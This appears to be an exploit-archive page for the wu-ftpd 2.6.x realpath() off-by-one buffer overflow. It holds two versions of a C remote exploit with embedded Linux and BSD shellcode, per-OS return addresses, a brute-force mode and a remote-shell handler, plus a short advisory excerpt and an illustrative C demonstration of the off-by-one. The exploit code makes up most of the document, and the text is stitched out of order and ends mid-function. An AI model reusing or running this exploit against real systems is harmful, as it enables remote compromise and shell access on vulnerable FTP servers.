        dir_nm[cmd_f++]=(0x43);
        dir_nm[cmd_f++]=(0x57);
        dir_nm[cmd_f++]=(0x44);

        send(sock,dir_nm,strlen(dir_nm),(NRL));
        (u_int)sleep(SCS);
        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

        if(!strstr(get_nm,(CWD_COMM_SCS)))
        {
                fprintf(stdout," [-] CWD command failed.\n\n");
                exit(FAD);
        }
        return(NRL); /* declared int: return a value instead of falling through */
}

int send_shellcode(int sock,int type,char *dir_nm)
{
        int dr_n=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)dir_nm,(NRL),(GET_R));
        /* MKD command */
        dir_nm[cmd_f++]=(0x4d);
        dir_nm[cmd_f++]=(0x4b);
        dir_nm[cmd_f++]=(0x44);
        dir_nm[cmd_f++]=(0x20);

        for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
        {
                dir_nm[dr_n]=(DEF_NOP);
        }
        for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
        {
                dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
        }
        dir_nm[dr_n++]=(0x0d);
        dir_nm[dr_n++]=(0x0a);

        if(type)
        {
                send(sock,dir_nm,strlen(dir_nm),(NRL));
                (u_int)sleep(SCS);
                memset((char *)get_nm,(NRL),sizeof(get_nm));
                recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
                        exit(FAD);
                }
        }
        /* CMD command */
        cmd_f=(NRL);
        dir_nm[cmd_f++]=(0x43);
        dir_nm[cmd_f++]=(0x57);
        dir_nm[cmd_f++]=(0x44);

        send(sock,dir_nm,strlen(dir_nm),(NRL));
        (u_int)sleep(SCS);
        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,(GET_R)-1,(NRL));

        if(!strstr(get_nm,(CWD_COMM_SCS)))
        {
                fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
                exit(FAD);
        }
        return(NRL); /* declared int: return a value instead of falling through */
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
        char atk_bf[(GET_R)];
        {
                fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));    /* 01 */
                fprintf(stdout," [+] 02: make shell-code directory.\n");
                (int)send_shellcode(sock,d_type,(atk_bf));      /* 02 */
                fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));    /* 03 */
                fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));    /* 04 */
                fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));    /* 05 */
                fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));    /* 06 */
                fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));    /* 07 */
                fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));    /* 08 */
                fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));    /* 09 */
                fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));    /* 10 */
                fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));    /* 11 */
                fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));    /* 12 */
                fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));    /* 13 */
                fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));    /* 14 */
                fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
                (int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));    /* 15 */
                (int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
        }
        return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
        int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
        char get_nm[(GET_R)];

        memset((char *)atk_bf,(NRL),(GET_R));
        if(type) /* MKD command */
        {
                atk_bf[cmd_f++]=(0x4d);
                atk_bf[cmd_f++]=(0x4b);
                atk_bf[cmd_f++]=(0x44);
                atk_bf[cmd_f++]=(0x20);
        }
        else /* RMD command */
        {
                atk_bf[cmd_f++]=(0x52);
                atk_bf[cmd_f++]=(0x4d);
                atk_bf[cmd_f++]=(0x44);
                atk_bf[cmd_f++]=(0x20);
        }
        for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
                atk_bf[r_rn_1++]=(0x41);
        {
                *(long *)&atk_bf[r_rn_1]=(sh_addr);
                r_rn_1+=(DEF_ALIGN);
                *(long *)&atk_bf[r_rn_1]=(sh_addr);
                r_rn_1+=(DEF_ALIGN);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x41);
                atk_bf[r_rn_1++]=(0x0d);
                atk_bf[r_rn_1++]=(0x0a);
        }
        send(sock,atk_bf,strlen(atk_bf),(NRL));
        (u_int)sleep(SCS);
        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

        if(type) /* MKD command */
        {
                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
                        exit(FAD);
                }
                else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
        }
        else /* RMD command */
        {
                if(!strstr(get_nm,(CWD_COMM_SCS)))
                {
                        fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
                        exit(FAD);
                }
                else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
        }
        return(NRL); /* declared int: return a value instead of falling through */
}

int main(int argc,char *argv[])
{
        int opt_g,sock,__bf=(NRL);
        int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
        char user_id[(DEF_VA)]=(DEF_STR);
        char pass_wd[(DEF_VA)]=(DEF_STR);
        char tg_host[(DEF_VA)]=(DEF_HOST);
        int tg_port=(DEF_PORT);
        u_long sh_addr=(plat[t_g].sh_addr);

        (void)banrl();
        while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
        {
                extern char *optarg;
                switch(opt_g)
                {
                        case 'M':
                        case 'm':
                                mx_bf=(atoi(optarg));
                                bf_lsz=((0x1000)/mx_bf);
                                break;

                        case 'H':
                        case 'h':
                                memset((char *)tg_host,(NRL),sizeof(tg_host));
                                strncpy(tg_host,optarg,sizeof(tg_host)-1);
                                break;

                        case 'U':
                        case 'u':
                                memset((char *)user_id,(NRL),sizeof(user_id));
                                strncpy(user_id,optarg,sizeof(user_id)-1);
                                break;

                        case 'P':
                        case 'p':
                                memset((char *)pass_wd,(NRL),sizeof(pass_wd));
                                strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
                                break;

                        case 'N':
                        case 'n':
                                tg_port=(atoi(optarg));
                                break;

                        case 'S':
                        case 's':
                                sh_addr=strtoul(optarg,(NRL),(NRL));
                                break;

                        case 'T':
                        case 't':
                                if((t_g=(atoi(optarg)))<(3))
                                        sh_addr=(plat[t_g].sh_addr);
                                else (void)prcode_usage(argv[(NRL)]);
                                break;

                        case 'B':
                        case 'b':
                                __bf=(SCS);
                                break;

                        case 'I':
                        case 'i':
                                (void)prcode_usage(argv[(NRL)]);
                                break;

                        case '?':
                                (void)prcode_usage(argv[(NRL)]);
                                break;
                }
        }
        if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
                (void)prcode_usage(argv[(NRL)]);

        memset((char *)home_dir,(NRL),sizeof(home_dir));
        snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);

        if(!__bf)
        {
                fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
                fprintf(stdout," [+] address: %p.\n",sh_addr);
                fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
                fflush(stdout);

                sock=(int)setsock(tg_host,tg_port);
                (void)re_connt(sock);
                fprintf(stdout," [  OK  ]\n");

                fprintf(stdout," [1] ftpd connection login.\n");
                (void)ftpd_login(sock,user_id,pass_wd);

                fprintf(stdout," [2] send exploit code.\n");
                (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
                close(sock);

                fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
                fflush(stdout);

                sock=(int)setsock(tg_host,tg_port);
                (void)re_connt(sock);
                fprintf(stdout," [  OK  ]\n");

                fprintf(stdout," [3] ftpd connection login.\n");
                (void)ftpd_login(sock,user_id,pass_wd);

                fprintf(stdout," [4] send exploit code.\n");
                (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

                fprintf(stdout," [5] Waiting, execute the shell ");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".\n");
                (void)conn_shell(sock);
                close(sock);
        }
        else
        {
                int bt_num=(NRL);
                t_g=(4);
                sh_addr=(plat[t_g].sh_addr);
                fprintf(stdout," [*] Brute-Force mode.\n");
                fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
                fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

                for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
                {
                        sh_addr=(u_long)null_chk(sh_addr);
                        fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
                        fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
                        fflush(stdout);

                        sock=(int)setsock(tg_host,tg_port);
                        (void)re_connt(sock);
                        fprintf(stdout," [  OK  ]\n");

                        fprintf(stdout," [1] ftpd connection login.\n");
                        (void)ftpd_login(sock,user_id,pass_wd);

                        fprintf(stdout," [2] send exploit code.\n");
                        if(bt_num==(NRL))
                        {
                                (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
                        }
                        else
                        {
                                (void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
                        }
                        close(sock);

                        fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
                        fflush(stdout);

                        sock=(int)setsock(tg_host,tg_port);
                        (void)re_connt(sock);
                        fprintf(stdout," [  OK  ]\n");

                        fprintf(stdout," [3] ftpd connection login.\n");
                        (void)ftpd_login(sock,user_id,pass_wd);

                        fprintf(stdout," [4] send exploit code.\n");
                        (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

                        fprintf(stdout," [5] Waiting, execute the shell ");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".\n");
                        (void)conn_shell(sock);
                        close(sock);

                        sh_addr+=(bf_lsz);
                }
        }
        exit(NRL);
}

int setsock(char *u_host,int u_port)
{
        int sock;
        struct hostent *sxp;
        struct sockaddr_in sxp_addr;

        if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
        {
                return(FAD);
        }
        if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
        {
                return(FAD);
        }
        sxp_addr.sin_family=AF_INET;
        sxp_addr.sin_port=htons(u_port);
        sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
        bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

        if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
        {
                return(FAD);
        }
        return(sock);
}

void conn_shell(int conn_sock)
{
        int died;
        int ex_t=(NRL);
        char *command=(DEF_COMM);
        char readbuf[(GET_R)];
        fd_set rset;

        memset((char *)readbuf,(NRL),sizeof(readbuf));
        fprintf(stdout," [*] Send, command packet !\n\n");
        send(conn_sock,command,strlen(command),(NRL));

        for(;;)
        {
                fflush(stdout);
                FD_ZERO(&rset);
                FD_SET(conn_sock,&rset);
                FD_SET(STDIN_FILENO,&rset);
                select(conn_sock+1,&rset,NULL,NULL,NULL);

                if(FD_ISSET(conn_sock,&rset))
                {
                        died=read(conn_sock,readbuf,sizeof(readbuf)-1);
                        if(died<=(NRL))
                        {
                                if(!ex_t)
                                        return;
                                else
                                        exit(NRL);
                        }
                        readbuf[died]=(NRL);
                        fprintf(stdout,"%s",readbuf);
                }
                if(FD_ISSET(STDIN_FILENO,&rset))
                {
                        died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
                        if(died>(NRL))
                        {
                                readbuf[died]=(NRL);
                                if(strstr(readbuf,"exit"))
                                        ex_t=(SCS);
                                write(conn_sock,readbuf,died);
                        }
                }
        }
        return;
}

void re_connt(int st_sock_va)
{
        if(st_sock_va==(FAD))
        {
                fprintf(stdout," [ Fail ]\n\n");
                exit(FAD);
        }
}

void banrl()
{
        fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

/* eoc */

- Vulnerability information (22975)

wu-ftpd 2.6.2, 2.6.0, 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22975)
unix remote
2003-08-06 Verified
0 Xpl017Elz
N/A
source: http://www.securityfocus.com/bid/8315/info
 
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has led to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack buffer overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
 
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
 
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.
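The off-by-one described above, reduced to its arithmetic, as an added example that is not part of the advisory text or of wu-ftpd. The length test in check_vulnerable() is an assumption modelled on the widely reported form of the fb_realpath() join (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN, where rootd is 1 only when the resolved dirname is "/"), not a quotation of the source; MAXPATHLEN is pinned to 1024, the FreeBSD value quoted on this page, and the function and case names are the example's own. The join is performed into a buffer one byte larger than MAXPATHLEN with a canary in the spare slot, so the stray NUL can be observed without undefined behaviour.

```c
#include <stdio.h>
#include <string.h>

/* Pinned to the FreeBSD value cited on this page; the arithmetic below does
 * not depend on the constant, only on the check being off by one. */
#undef MAXPATHLEN
#define MAXPATHLEN 1024

enum { JOIN_REJECTED = -1, JOIN_OK = 0, JOIN_OVERFLOW = 1 };

/* Assumed shape of the vulnerable length check. A separator byte is added
 * exactly when rootd == 0, so "+ rootd" is inverted: one byte too generous
 * in the normal case, one byte too strict when the dirname is "/". */
static int check_vulnerable(size_t rlen, size_t wlen, int rootd)
{
    return rlen + wlen + (size_t)rootd + 1 <= MAXPATHLEN;
}

/* Corrected check: count the separator only when one will be appended,
 * and always count the terminating NUL. */
static int check_fixed(size_t rlen, size_t wlen, int rootd)
{
    size_t sep = rootd ? 0 : 1;
    return rlen + sep + wlen + 1 <= MAXPATHLEN;
}

/* Join dir and base the way the resolver does: dir, an optional "/", base.
 * resolved[] is deliberately MAXPATHLEN + 1 bytes; the last byte is a canary
 * standing in for whatever sits after the real MAXPATHLEN buffer. */
static int join_with_canary(const char *dir, const char *base, int use_fixed)
{
    char resolved[MAXPATHLEN + 1];
    size_t rlen = strlen(dir), wlen = strlen(base);
    int rootd = (rlen == 1 && dir[0] == '/');
    int allowed = use_fixed ? check_fixed(rlen, wlen, rootd)
                            : check_vulnerable(rlen, wlen, rootd);

    if (rlen >= MAXPATHLEN)       /* dirname alone would not fit: out of scope here */
        return JOIN_REJECTED;
    if (!allowed)                 /* the real code fails with ENAMETOOLONG here */
        return JOIN_REJECTED;

    memset(resolved, 0, sizeof resolved);
    resolved[MAXPATHLEN] = 0x7f;  /* canary: the byte just past the real buffer */
    memcpy(resolved, dir, rlen + 1);
    if (!rootd)
        strcat(resolved, "/");
    strcat(resolved, base);       /* writes wlen + 1 bytes; the NUL may hit the canary */
    return resolved[MAXPATHLEN] == 0x7f ? JOIN_OK : JOIN_OVERFLOW;
}

/* Constructed inputs: dir = "/" followed by dirlen - 1 'a's, base = baselen 'b's. */
static int demo_case(size_t dirlen, size_t baselen, int use_fixed)
{
    static char dir[MAXPATHLEN + 2], base[MAXPATHLEN + 2];
    if (dirlen < 1 || dirlen > MAXPATHLEN || baselen > MAXPATHLEN)
        return JOIN_REJECTED;
    dir[0] = '/';
    memset(dir + 1, 'a', dirlen - 1);
    dir[dirlen] = '\0';
    memset(base, 'b', baselen);
    base[baselen] = '\0';
    return join_with_canary(dir, base, use_fixed);
}

int main(void)
{
    /* 1000 + "/" + 23 = exactly MAXPATHLEN characters: the case that slips through */
    printf("1024-char path, vulnerable check: %d (1 = NUL landed past the buffer)\n",
           demo_case(1000, 23, 0));
    printf("1024-char path, fixed check:      %d (-1 = rejected)\n", demo_case(1000, 23, 1));
    printf("1023-char path, vulnerable check: %d (0 = fits)\n", demo_case(1000, 22, 0));
    /* "/" + 1022 = 1023 characters fits, yet the inverted term rejects it */
    printf("root case, vulnerable check:      %d\n", demo_case(1, 1022, 0));
    printf("root case, fixed check:           %d\n", demo_case(1, 1022, 1));
    return 0;
}
```

The point to take from it: a resolved path of exactly MAXPATHLEN characters passes the original length test, so the string's terminating NUL is written one byte past the buffer, while a path under "/" is refused one byte early; both symptoms come from the same inverted term. A single NUL write is all the advisory describes; whether that becomes code execution depends on what the compiler placed after the buffer, which is why the exploits on this page carry per-build addresses in plat[] and a brute-force mode.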

/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
**
** Update: 
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/

#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>	/* memset, strlen, strstr, strncpy, strcmp */
#include <strings.h>	/* bzero */
#include <sys/types.h>	/* u_long, u_int */
#include <sys/time.h>	/* select, fd_set */
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);

struct os
{
	int num;
	char *v_nm;
	u_long sh_addr;
	u_long bf_addr;
	char *shellcode;
	int off_st;
	char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
	/* setuid/chroot-break/execve shellcode by Lam3rZ */
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
	"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
	"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
	"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
	"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
	"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
	"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
	"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
	"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
	"\x2e\x2e\x31\x31";

char bsd_shellcode_ffx2[]=
	/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
	"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
	"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
	"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
	"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
	"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
	"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
	"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
	"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
	"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
	"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
	"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
	"\x63\x6f\x6d";

struct os plat[]=
{
	/*
	** I enjoy version up, will not share more. :-}
	*/
	{
	0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
	0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
	0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
	0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	0x82,NULL,0x0,0x0,NULL,0,NULL
	}
};

void prcode_usage(char *f_nm)
{
	int r_n=(NRL);
	fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
	fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
	fprintf(stdout," \t-u [userid] : User id.\n");
	fprintf(stdout," \t-p [passwd] : User password.\n");
	fprintf(stdout," \t-n [port num] : Target port number.\n");
	fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
	fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
	fprintf(stdout," \t-i : help information.\n");
	fprintf(stdout," \t-q : banner scan mode.\n");
	fprintf(stdout," \t-c : check exploit test.\n");
	fprintf(stdout," \t-t [target num] : Select target number.\n");
	fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
	for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
	{
		fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
	}
	fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
	fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
	fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
	exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
	int chk_0x2f=(NRL);
	for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
	{
		if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
		{
		fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
		exit(FAD);
		}
	}
	if((sh_addr>>(NRL)&0xff)==(0x00))
	{
		return(sh_addr+=(SCS));
	}
	else return(sh_addr);
}

int bscann(char *chk_ban)
{
	fprintf(stdout,"\n [+] Checking, banner ...\n");
	if(strstr(chk_ban,"wu-2.6.0"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.1"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.2"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else
	{
	fprintf(stdout," [x] This version does not support exploit.\n");
	return(FAD);
	}
}

void ftpd_login(int sock,char *user,char *pass)
{
	char send_recv[(GET_R)];

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(b_scan)
	{
		b_scan=(NRL);
		if(((int)bscann(send_recv))==(FAD))
		{
			fprintf(stdout," [-] exploit stop.\n\n");
			exit(FAD);
		}
	}
	if(!strstr(send_recv,(FTP_CONN_SCS)))
	{
		fprintf(stdout," [-] ftpd connection failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [*] ftpd connection success.\n");
	fprintf(stdout," [+] User id input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
